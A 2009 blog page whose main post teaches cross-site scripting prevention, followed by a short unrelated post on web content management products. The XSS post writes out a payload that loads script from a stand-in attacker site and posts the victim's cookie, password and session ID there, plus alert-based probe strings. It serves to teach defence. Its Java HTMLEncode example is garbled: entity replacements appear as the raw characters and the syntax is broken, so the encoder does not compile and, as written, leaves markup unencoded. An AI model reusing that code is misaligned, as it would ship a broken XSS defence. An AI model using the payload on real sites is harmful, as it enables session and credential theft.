Saturday, November 14, 2009

Prevent your web application from Cross Site Scripting Attack

Introduction:
Recently I worked on a Portal project for one of the largest telecommunication company in the world. The development was almost completed and it went through a security scan at the end, just few days before go-live. The scan had found security breaches and that made lot of code change at that time. One of the major problems was cross site scripting vulnerability. Briefly Cross-site scripting is a hacking technique that allows an attacker to send malicious content from an end-user and collect some type of data from the victim. Cross site scripting is believed to be one of the most common application layer hacking techniques.

This document provides information about what is cross site scripting, how cross site scripting attack is performed by the attackers, how it can be resolved by developers, how it can be tested by testers. We all know that “prevention is better that the cure” so this document explains finally how cross site scripting attack can be prevented.

What is cross site scripting?
Technically cross site scripting is the capability of web browsers by which one web application can execute javascript stored in other web site. Let us consider two web sites http://localhost:8080/MyGoodSite and http://localhost:8080/MyBadSite (the names are given purposefully). The good site has a login screen which needs javascipt validation when clicking on the login button. The login page may contain the following lines of codes.
<HTML>
<HEAD>
<TITLE> Login to www.MyGoodSite.com </TITLE>
</HEAD>
<script src=" http://localhost:8080/MyBadSite/js/validation.js"></script>
<script>
…..
…..
<input type="button" onclick="javascript:validateLogin();return false;" value="Login">
…..
</HTML>

Here the javascript function validateLogin is written in a javascript file validation.js which is stored in another web application MyBadSite. This works fine.
The advantage of storing validation script in separate web site is that it can be easily re-used in other applications easily and it can be maintained efficiently from a single place.
Every good thing has a bad side as well. Here also the same. Internet hackers and attackers can badly utilize this technology. Let us see below with example how it can be done.

How attackers can determine vulnerable web sites?
First thing attackers will need to do is find some cross site scripting vulnerable site. The centers of attraction for the attackers are web sites those generates web pages dynamically without doing much security scans. Today social networking website is a common place to share information and thoughts to the entire world. Users can generate their own content; even they can provide links to other websites as well. Whatever text they enter in the input box (text area or text box) they like to see the same text in the web page. Now if the text is not encoded properly it can be badly utilized to inject some malicious code in the web page. Attackers may find such web sites and perform a simple test to check if the site is vulnerable.
Let us consider a website where home page (home.jsp) displays the logged in user name as a welcome message and the login name is passed as a parameter in the URL.
The part of the home.jsp code can be as follows:


<HTML>
<HEAD>
<TITLE> Welcome to www.MyGoodSite.com </TITLE>
</HEAD>
<%
String userId = (String)request.getParameter("userId");
%>
<TABLE width="640">
<TR>
<TD width="640" align="right"> Welcome <b><%=userId%></b></TD>
</TR>
</TABLE>
…..
…..
</form>
</BODY>
</HTML>

The good URL to access this page will look like http://localhost:8080/MyGoodSite/home.jsp?userId=john. It shows the message “Welcome john” on the home page. Now simply type the following URL in a web browser
http://localhost:8080/MyGoodSite/home.jsp?userId=<script>alert('this is a vulnerable site')</script>

You see the below alert instead of the welcome message:


    This is a success for the attacker. First move on the attack is successful.
    Similar situation can happen in social networking web sites. Developers might choose to pass the text entered by the users through URL parameters. In other situations user is searching for some texts and developers might choose to implement “ not found” feature by passing the entered search string as a parameter in URL. Also consider a case where the web site provides option to send greetings card and user might want to preview how the greeting message will like. Developers might decide to implement this by passing the entered message as a parameter.

    How cross site scripting attack is performed by the attackers?

    Once such a vulnerable site is found only the thing the attacker has to do now is to create a website (in this case MyBadSite) which will be the source for malicious code. This code will be injected into the vulnerable site through cross site scripting. In this example we will assume that the attacker writes an AJAX based javascript function xmlhttpPost which reads the cookie information of the victim and sends it silently to attacker. Now here the trick is that the javascript needs to be executed at the victim’s machine to retrieve his/her private information. So the attacker will try to lure the victim by sending links through email or through some advertisement pop-up etc.

    Let us explain the sequence of steps performed by the attacker and the user below to perform an attack.

    We will consider the case of social networking web site with a discussion forum implemented. It is assumed that after successful login the userid, password is stored in cookie. The appendix section provides the code used to perform the attack.

    1. Community User Alice logs into the site MyGoodSite.
    2. The user credential and other personal information are stored in the cookie as this is how personalization implemented in MyGoodSite
    3. Alice opens up a discussion thread on some topic asking for people’s opinion on this.
    4. Bob does a vulnerability test of MyGoodSite site and finds that the site is vulnerable to cross site scripting.
    5. Bob posts a message like this:
    You can find related information <script language="Javascript" src="http://localhost:8080/MyBadSite/js/ajaxwrite.js"></script><a href = "javascript:xmlhttpPost('http://localhost:8080/MyBadSite/writecookie.jsp')"> here</a>
    6. In the browser it appears as “You can find related information here
    7. Alice clicks on the link on text “here”
    8. The code in step 5 will first download the javascript file ajaxwrite.js from MyBadSite. It will be trusted as this will be invoked from within MyGoodSite. xmlhttpPost is a method within ajaxwrite.js file. So it will be executed.
    9. The cookie information from Alice’s machine will then be silently transferred to Bob’s machine as this calls an AJAX based javascript without her notice. The cookie will be available in the following format:
    “Cookie Info=password=Alice123; username=Alice; JSESSIONID=B7C0B46100D622678703B9501EB9FC51”
    Once the cookie information is received by Bob, he might misuse Alice’s account.

    This is a simple example of how personal information can be retrieved using cross site scripting. There are several other type of attacks can be performed using cross site scripting. Some of them are as below.
    Account hijacking - An attacker can hijack the user's session before the session cookie expires and take actions with the privileges of the user who accessed the URL, such as issuing database queries and viewing the results.
    Malicious script execution - Users can unknowingly execute JavaScript, VBScript, ActiveX, HTML, or even Flash content that has been inserted into a dynamically generated page by an attacker.
    Worm propagation - With Ajax applications, XSS can propagate somewhat like a virus. The XSS payload can autonomously inject itself into pages, and easily re-inject the same host with more XSS, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user.
    Information theft - Via redirection and fake sites, attackers can connect users to a malicious server of the attacker's choice and capture any information entered by the user. Denial of Service - Often by utilizing malformed display requests on sites that contain a Cross-Site Scripting vulnerability, attackers can cause a denial of service condition to occur by causing the host site to query itself repeatedly .
    Browser Redirection - On certain types of sites that use frames, a user can be made to think that he is in fact on the original site when he has been redirected to a malicious one, since the URL in the browser's address bar will remains the same. This is because the entire page isn't being redirected, just the frame in which the JavaScript is being executed.
    Manipulation of user settings - Attackers can change user settings for nefarious purposes.
    Changing the theme of the page – Instead of injecting script tag, attackers can include any html tag like <style>, <img> etc to change the layout of the page.

    Cross site scripting can generally be subdivided into two categories: stored and reflected attacks. The main difference between the two is in how the payload arrives at the server. Stored attacks are just that in some form stored on the target server, such as in a database, or via a submission to a bulletin board or visitor log. The victim will retrieve and execute the attack code in his browser when a request is made for the stored information. Reflected attacks, on the other hand, come from somewhere else. This happens when user input from a web client is immediately included via server-side scripts in a dynamically generated web page. Via some social engineering, an attacker can trick a victim, such as through a malicious link or "rigged" form, to submit information which will be altered to include attack code and then sent to the legitimate server. The injected code is then reflected back to the user's browser which executes it because it came from a trusted server. The implication of each kind of attack is the same.

    How it can be resolved by developers?
    Cross-Site Scripting attacks can be avoided by carefully validating all input, and properly encoding all output. Encoding of output ensures that any scriptable content is properly encoded for HTML before being sent to the client. This is done with the function HttpUtility.HtmlEncode, as shown in the following Label control

    sample:Label2.Text = HttpUtility.HtmlEncode(input)

    Be sure to consider all paths that user input takes through your application. For instance, if data is entered by the user, stored in a database, and then redisplayed later, you must make sure it is properly encoded each time it is retrieved. If you must allow free-format text input, such as in a message board, and you wish to allow some HTML formatting to be used, you can handle this safely by explicitly allowing only a small list of safe tags. Here are examples of how to do this safely:

    Java Example:
    public static String HTMLEncode(String aTagFragment){
    final StringBuffer result = new StringBuffer();
    final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment);
    char character = iterator.current();

    while (character != StringCharacterIterator.DONE ){
    if (character = = '<') { result.append("<"); } else if (character = = '>') {
    result.append(">");
    }
    else if (character = = '\"') {
    result.append(""");
    }
    else if (character = = '\") {
    result.append("'");
    }
    else if (character = = '\\') {
    result.append("\");
    }
    else if (character = = '&') {
    result.append("&");
    }
    else {
    //the char is not a special one
    //add it to the result as is
    result.append(character);
    }
    character = iterator.next();
    }
    return result.toString();
    }

    How it can be tested by testers?
    The following steps outline how to manually test an application for Cross-Site Scripting.
    Step 1. Open any Web site in a browser, and look for places on the site that accept user input such as a search form or some kind of login page. Enter the word test in the search box and send this to the Web server.
    Step 2. Look for the Web server to respond back with a page similar to something like "Your search for 'test' did not find any items" or "Invalid login test." If the word "test" appears in the results page, you are in luck.
    Step 3. To test for Cross-Site Scripting, input the string "<script>alert('hello')</script>" without the quotes in the same search or login box you used before and send this to your Web server.
    Step 4. If the server responds back with a popup box that says "hello", then the site is vulnerable to Cross-Site Scripting.
    Step 5. If Step 4 fails and the Web site does not return this information, you still might be at risk. Click the 'View Source' option in your browser so you can see the actual HTML code of the Web page. Now find the <script> string that you sent the server. If you see the entire "<script>alert('hello')</script>" text in this source code, then the Web server is vulnerable to Cross-Site Scripting.

    How to prevent cross site scripting?
    The following recommendations will help you build web applications capable of withstanding Cross-Site Scripting attacks.
    Define what is allowed. Ensure that the web application validates all input parameters (cookies,headers, query strings, forms, hidden fields, etc.) against a stringent definition of expected results.
    Check the response from POST and GET requests to ensure what is being returned is what is expected, and is valid.
    Remove conflicting characters, brackets, and single and double quotes from user input by encoding user supplied data. This will prevent inserted scripts from being sent to end users in a form that can be executed.
    Whenever possible, limit all client-supplied data to alphanumeric data. Using this filtering scheme, if a user entered " <script>alertdocumentcookie( 'aaa') </script>", it would be reduced to "scriptalertdocumentcookiescript". If non-alphanumeric characters must be used, encode them as HTML entities before using them in an HTTP response, so that they cannot be used to modify the structure of the HTML document.
    Use two-factor customer authentication mechanisms as opposed to single-factor authentication.
    Verify the origin of scripts before you modify or utilize them.
    Do not implicitly trust any script given to you by others (whether downloaded from the web, or given to you by an acquaintance) for use in your own code.
    Custom JSP tag can be implemented to render the dynamic content on the web page. The tag implementation can encode the text to be displayed on the web page. This will be very effective form maintenance perspective, as any change in the encoding logic will need code change in one place only.
    Use automated application vulnerability assessment tool, like AppScan from Sanctum, WebInspect from HP.


    Conclusion:
    Cross Site Scripting attack is one of the most common application level attacks that hackers use to sneak into web applications today, and one of the most dangerous. Around 27% of the internet attackers use this mechanism of attack. Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as outlined in this paper, this is often done without the knowledge of either the client or the organization being attacked. In order to prevent this malicious vulnerability, it is critical that an organization implement both an online and offline security strategy.
    All types of web applications including internet and intranet applications can be attacked using cross site scripting technology. So all internet and intranet applications should have preserve some effort to prevent this issue by educating the developers in well advance. Developers should strictly follow the recommendations provided since beginning of development, otherwise the impact will be very high if the code change is done at the end of the project.

    Web Content Management System - A Basic Corporate Need

    This article is to provide basic overview on Web Content Management(WCM) system. Let us first discuss why do we need a WCM system. Remember the earlier days websites, where the web pages once created never it was changed. Changing a single line of content would require web developer's help. Now the requirement has changed, no more static web sites are fulfilling user's demand. Today's Internet users want to create their own contents and immediately would like to view the contents in the web site live. The way I would like to view this blog.
    Companies have different requirements. Once they create web contents they like to publish the content through multiple channels - corporate web sites, press release, company brochure and emails campaigns. Maintaining the consistency of data across all these delivery channels is a challenge without any robust content management system. Today in the age of globalization, companies also need to deliver the content in multiple languages without redeveloping entire website or Portal. Publishing the content with company standard quality is also important. Companies do not want to depend on the web developers to publish contents, business users should be able to publish content. Collaborative content creation is another bigger demand from business now a days. It not only helps to create content quickly but also with great quality.
    To satisfy all these demands we need a robust web content management system. Following diagram explains how an web content management works.

    Below are step by step explanation how the WCM system works.
    1. Content authors create web content in WCM system. The contents are stored in standard format like XML. Authors can preview web contents based on pre-defined templates called presentation templates. These templates allow to create multiple view of the same web contents, also for multiple delivery channels. Once authors are done with entering content, they forward the content to content reviewers and approvers.
    2. Content reviewers review the contents. If they are not satisfied with the content then sends the content back to author for further modification, otherwise send the content to content approver for their approval. Content approvers are the final authority to decide when to publish the web contents.
    3. Once the content approvers approve the content the desired format of the content is published to designated delivery channel as per the publishing configuration. The web viewable format of the content is published to web site or Portal.
    4. WML(Wireless Markup Language) format of the content is published to application servers that supports WAP(Wireless Application Protocol) enabled devices like mobile.
    5. The printer friendly format of the content is published to Print Server, for printing in press.
    6. Email friendly format of the content is sent through emails for email campaign or news letters.

    Wen content management system allows business to publish right format of the content to right delivery channel at right time.

    There are several industry standard Web Content Management Tools available in the market, they provide end to end WCM solution.

    Below are few market leaders in WCM space -

    • Oracle UCM Web Content Management - This is the earlier known WCM product Stellent. You can develop your web sites very quickly using this product. It provides very good user interface to create or modify content. It provides in context editing of the content. Provides a set of pre-defined templates to jump start your web site development.
    • Vignette Web Content Management Solutions - This tool enables us to provide high performing web sites. Currently part of Autonomy and Autonomy has clear focus on this tool to retain it as one of the WCM market leader. This tool provides a robust web content management system with high performing caching mechanism.
    • EMC Documentum Web Content Management - Being leader in Enterprise content management(ECM) space, EMC Documentum provides a robust end to end Web Content Management solution too. It provides flexible way to create web contents for multiple devices in multiple format. It provides out of the box integration with industry leading application/Portal server.
    • Autonomy Interwoven Web Content Management - Provides a very good user interface to create content. Stores the content in very flexible format. The publishing tool from Interwoven supports wide ranges of sources and target. Allows very good preview feature for the content authors and reviewers.
    • There are several Open source WCM products available in the market. Alfresco being at the leaders position. It allows to build a low cost, efficient web site and Portals.